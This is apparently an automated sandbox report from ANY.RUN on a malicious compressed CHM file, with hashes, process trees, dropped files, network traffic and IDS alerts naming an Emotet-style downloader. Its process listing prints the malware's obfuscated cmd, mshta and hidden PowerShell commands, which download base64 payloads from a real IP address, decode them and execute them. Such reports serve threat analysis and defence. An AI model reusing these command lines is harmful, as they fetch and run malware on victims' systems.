analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dopolnenie_CBR.chm.Z

Full analysis: https://app.any.run/tasks/d750e717-4976-4417-b9df-d8b59782e2bb
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 08:52:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/x-compress
File info: compress'd data 16 bits
MD5:

16A697C5F413E4DBE994BE8EBB29F474

SHA1:

33CB0004730FA08E8E1E369DB6BA6ADE3FBC76F2

SHA256:

AD30C94617791F1A743B5DCBE7C982FCCC101BF29A83DDEAC3807D1EC497C697

SSDEEP:

192:zKHXBSMTlwuPfKWGpLGh/hpnXM+Gd4+fRHBZJKiPeCf:zKRSMT3KWGpLGza9dNRHrJKCeCf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • priprhff.com (PID: 1104)
      • cmd.exe (PID: 1104)
      • cmd.exe (PID: 3984)
      • priprhff.com (PID: 2928)
      • priprh.com (PID: 2680)
      • priprhf.com (PID: 3148)
      • cmd.exe (PID: 2412)
    • Changes the autorun value in the registry

      • priprh.com (PID: 2680)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 3704)
      • mshta.exe (PID: 4076)
      • priprh.com (PID: 2680)
    • Reads Internet Cache Settings

      • hh.exe (PID: 3704)
    • Reads internet explorer settings

      • hh.exe (PID: 3704)
    • Starts application with an unusual extension

      • priprhff.com (PID: 2928)
      • cmd.exe (PID: 3984)
      • priprhf.com (PID: 3148)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1104)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3984)
      • priprhf.com (PID: 3148)
      • priprh.com (PID: 2680)
    • Creates files in the program directory

      • cmd.exe (PID: 2412)
    • Creates files in the user directory

      • priprh.com (PID: 2680)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 2412)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 4076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.z | UNIX Compressed data (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
11
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start winrar.exe no specs hh.exe no specs cmd.exe no specs mshta.exe cmd.exe priprhff.com no specs priprhff.com no specs priprhf.com priprh.com cmd.exe no specs systeminfo.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3260"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.chm.Z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3704"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIa3260.47850\Dopolnenie_CBR.chmC:\Windows\hh.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1104"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4076mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3984"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\priprhff.com && C:\Users\admin\AppData\Local\Temp\\priprhff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\priprhf.com& C:\Users\admin\AppData\Local\Temp\\priprhff.com /c C:\Users\admin\AppData\Local\Temp\\priprhf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\priprh.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\priprh.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\priprh.com $sv; C:\Users\admin\AppData\Local\Temp\\priprh.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1104C:\Users\admin\AppData\Local\Temp\\priprhff.com /c C:\Users\admin\AppData\Local\Temp\priprhff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2928C:\Users\admin\AppData\Local\Temp\\priprhff.com /c C:\Users\admin\AppData\Local\Temp\\priprhf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\priprh.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\priprh.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\priprh.com $sv; C:\Users\admin\AppData\Local\Temp\\priprh.com;C:\Users\admin\AppData\Local\Temp\priprhff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3148C:\Users\admin\AppData\Local\Temp\\priprhf.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\priprh.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\priprh.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\priprh.com $sv; C:\Users\admin\AppData\Local\Temp\\priprh.com;C:\Users\admin\AppData\Local\Temp\priprhf.com
priprhff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2680"C:\Users\admin\AppData\Local\Temp\priprh.com"C:\Users\admin\AppData\Local\Temp\priprh.com
priprhf.com
User:
admin
Company:
MS DefenderApplication
Integrity Level:
MEDIUM
Description:
MS DefenderApplicationController
Version:
2.0.4.9
2412"C:\Windows\System32\cmd.exe" /C systeminfo >> C:\ProgramData\INFOCONTENT.TXTC:\Windows\System32\cmd.exepriprh.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
986
Read events
888
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
0
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
3148priprhf.comC:\Users\admin\AppData\Local\Temp\priprh.txttext
MD5:53F4A016A61040273478E1C3C10FF8A3
SHA256:9FB4281BC5994209DCED167E4D34BFEDF3B8A6F882B1A7C92F30970DB5E30548
2412cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:5E768BB54AA4C702AD7395872F79234A
SHA256:15AF773E48D1B0BD10FA3A66EDA6A670F81E67BB379D90CCF8546788B269D996
4076mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
3260WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3260.47850\Dopolnenie_CBR.chmchi
MD5:F7E6785E5F6BFEB8AB16A87968B9A172
SHA256:77775F1DBFCEB1F1915D2DB067A0A8239DAB771D41084FC89E9478F3995F2498
3148priprhf.comC:\Users\admin\AppData\Local\Temp\priprh.comexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
2680priprh.comC:\Users\admin\AppData\Roaming\conhost.exe 1C9B74E8.exeexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
3984cmd.exeC:\Users\admin\AppData\Local\Temp\priprhff.comexecutable
MD5:AD7B9C14083B52BC532FBA5948342B98
SHA256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
3984cmd.exeC:\Users\admin\AppData\Local\Temp\priprhf.comexecutable
MD5:92F44E405DB16AC55D97E3BFE3B132FA
SHA256:6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4076
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
3148
priprhf.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4076
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious
3148
priprhf.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3148
priprhf.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3148
priprhf.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3148
priprhf.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
No debug info